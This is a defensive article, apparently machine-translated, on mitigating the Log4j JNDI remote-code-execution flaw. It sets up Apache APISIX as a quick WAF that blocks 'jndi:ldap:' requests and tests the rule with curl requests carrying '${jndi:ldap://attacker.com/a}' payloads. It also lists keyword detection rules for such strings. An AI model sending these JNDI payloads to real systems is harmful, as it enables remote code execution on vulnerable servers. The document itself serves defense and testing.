0x01 vulnerability background
The recent security problems caused by log4j have attracted much attention in the industry. Log4j, as a log component widely used in the Java ecosystem, is used and relied on by many Java software systems. For example, Apache Struts2, Flink, ElasticSearch database, etc. with the migration of time, the list items will increase due to the software related to Log4j2.
In the current emergency plan given by the industry, it can be used as a temporary emergency solution by modifying JVM parameters and setting environment variables, but it is still necessary to continuously locate assets and judge the scope of harm in the follow-up.
The industry's solutions are as follows:
Log4j Vulnerability situation Vulnerability hazards: high risk, remote code execution Affected version: Log4j2.x<=2.14.1 Unaffected version: Apache log4j-2.15.0-rc1 Apache Log4j2 Is an open source Java Logging tool, which is used by a large number of business frameworks. This vulnerability is for Log4j2 Provided lookup This function allows developers to read the configuration in the corresponding environment through some protocols. However, in the process of implementation, the input is not strictly judged, resulting in loopholes. Scope of influence Possible affected applications include but are not limited to the following: Spring-Boot-strater-log4j2,Apache Struts2,Apache Solr,Apache Flink,Apache Druid,ElasticSearch,flume,dubbo,Redis,logstash,kafka. For more components, please refer to the following links: https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/usages?p=1 Affected products: under verification. Countermeasures: 1,waf Add an interception rule to the blocking security device. The keyword is“ jndi:ldap://","jndi:rmi"; 2,Whether the flow monitoring equipment is relevant Dnslog The domain name request and the data packet contain“ jndi:ldap://”And "jndi:rmi" data packets, locate the injured assets and carry out emergency disposal. 3,stay log4j2.ini Can be set in configuration log4j2formatMsgNoLookups=True,Prohibit parsing JDNI 4,System environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS Set to true 5,Jvm Operating parameters-Dlog4j2.formatMsgNoLookups=true 6,Patch link: https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1 Detection scheme 1,Because an attacker may use dnslog Conduct vulnerability detection, so you can monitor whether there is relevant information through traffic monitoring equipment Dnslog Domain name request to detect the attacked behavior; 2. You can monitor the relevant traffic or whether it exists in the log“ jndi:ldap://”And "jndi:rmi" to find possible attack lines For. 3,Check gitlab pom code jar Package and mirror jar package 4,use HIDS Process and path jar Package check 5,use awvs+jndi payload Conduct batch testing
Traffic detection system: create rules to complete threat inspection, which can be based on data retrieval at the Http protocol level, create inspection rules and carry out vulnerability early warning through the characteristics of vulnerabilities.
HIDS system: pull asset information based on the HIDS system and locate the affected asset range of Log4j.
WAF system: Based on the WAF system, create an interception strategy to discover and intercept the threat characteristic string. Next, we will give an emergency solution based on open source software platform in the way of WAF.
0x02 Apache APIs IX open source gateway
As a dynamic and real-time high-performance gateway system, Apache apisid also provides a mechanism to find Log4j problems and intercept them quickly. Based on this mechanism, it provides the possibility of an emergency plan. Apachahe apisix has several characteristics in this security emergency scenario: fast gateway deployment, fast strategy creation, and fast interception strategy repair.
0x03 installation of Apache APIs IX
Use Docker to quickly install APIs IX.
Installing Apache APIs IX
APISIX needs to rely on other software. In order to quickly deploy, use the All in one deployment scheme.
docker run -d \ -p 9080:9080 -p 9091:9091 -p 2379:2379 \ -v `pwd`/all-in-one/apisix/config.yaml:/usr/local/apisix/conf/config.yaml \ apache/apisix:whole
Install Apache apisid dashboard
docker run -d \ -p 19080:9080 -p 19091:9091 -p 12379:2379 -p 19000:9000 \ -v `pwd`/all-in-one/apisix/config.yaml:/usr/local/apisix/conf/config.yaml \ -v `pwd`/all-in-one/apisix-dashboard/conf.yaml:/usr/local/apisix-dashboard/conf/conf.yaml \ apache/apisix-dashboard:whole
The above Docker installation methods are for reference and can be adjusted according to the actual test and production environment.
0x04 interception feature
Log4j vulnerability in the process of emergency, white hat also creates a new bypass scheme for the emergency scheme. For the bypass, it needs to dynamically update the interception strategy. Using Apache apisik for emergency response is equivalent to quickly creating a WAF like firewall system in your own environment. This system is different from the traditional WAF firewall, but it does realize the threat discovery and interception function of the core of the WAF system. Based on the keywords: "jndi:ldap: / /" and "jndi:rmi", it can locate and intercept as positioning features.
If a new bypass scheme is generated later, you can use the dynamic policy creation mechanism provided by Apache apisid to quickly adjust the policy, that is, the adjustment function. Log4j, as a log service component with a long history, relies on many software system groups. Before completely upgrading and solving all relevant assets, Apache APISIX gives you a quick emergency choice.
0x05 emergency policy creation
Apache apisik is used to locate and block Keywords: jndi:ldap:. The implementation of this interception action function is completed by the serverless plug-in of apisik.
The so-called fast and dynamic emergency feature is to create an interception emergency strategy. You only need to quickly register and execute an executable script function based on the plug-in. After completing the definition and implementation of this function, you can complete the implementation of the interception strategy, as follows:
$ curl http://127.0.0.1:9080/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d '
{
"uri": "/*",
"plugins":{
"serverless-pre-function":{
"phase":"rewrite",
"functions":[
"return function(conf, ctx) local core = require(\"apisix.core\"); local payload, err = core.request.get_body(); if not payload then local uri_args, err = core.request.get_uri_args(ctx)\n if uri_args then payload = core.json.encode(uri_args, true) end; end; local m = ngx.re.match(payload, \"jndi:ldap:\", \"jo\"); if m then ngx.exit(401) end; end"
]
}
},
"upstream": {
"type": "roundrobin",
"nodes": {
"127.0.0.1:1980": 1
}
}
}'
The core of the overall strategy implementation is the Lua function. The processing process of the function is divided into three steps:
- Extract the request load (including the URL parameter transfer method of GET request and the parameter transfer method of POST/PUT request body)
- Regular matching malicious payload
- Intercept requests carrying malicious payload
0x06 verification of emergency strategy
GET method interception
Intercepting malicious payload in GET request parameters
$ curl -I 'http://127.0.0.1:9080/hello?foo=${jndi:ldap://attacker.com/a}'
HTTP/1.1 401 Unauthorized
......
POST method request interception
Intercept at POST Request body(application/json)Carrying malicious load in
$ curl -i 'http://127.0.0.1:9080/hello' -H 'Content-Type: application/json' -X POST -d '
{
"foo": "${jndi:ldap://attacker.com/a}"
}'
HTTP/1.1 401 Unauthorized
......
Body text/plain request interception
Intercepting malicious payload in POST request body (text/plain)
curl -i 'http://127.0.0.1:9080/hello' -H 'Content-Type: text/plain' -X POST -d '
${jndi:ldap://attacker.com/a}'
HTTP/1.1 401 Unauthorized
......
Body_application/x-www-form-urlencoded request interception
The interceptor carries malicious load in the POST request body (application/x-www-form-urlencoded, no URL encoding for the request body)
curl -i 'http://127.0.0.1:9080/hello' -H 'Content-Type: application/x-www-form-urlencoded' -X POST -d '
foo=${jndi:ldap://attacker.com/a}'
HTTP/1.1 401 Unauthorized
......
0x07 summary
Due to the particularity of Log4j vulnerability, there are many assets involved in emergency, large confirmation scope and tight emergency time. A rapid emergency plan is needed to alleviate this situation. Before all assets are properly upgraded, the protection strategy can be quickly adjusted in the process of changes in new bypass methods. The apahce APIs IX software platform in the open source community, based on the characteristics of rapid deployment, flexibility and dynamic functions, provides a new solution for the current emergency scenario of Log4j2. Although the Apache APIs IX gateway platform itself is not a simple WAF system, it can indeed play the role of vulnerability interception of WAF firewall.
reference resources
https://github.com/apache/apisix
https://mp.weixin.qq.com/s/t3y3EpSc6gJHG8fHZ806AA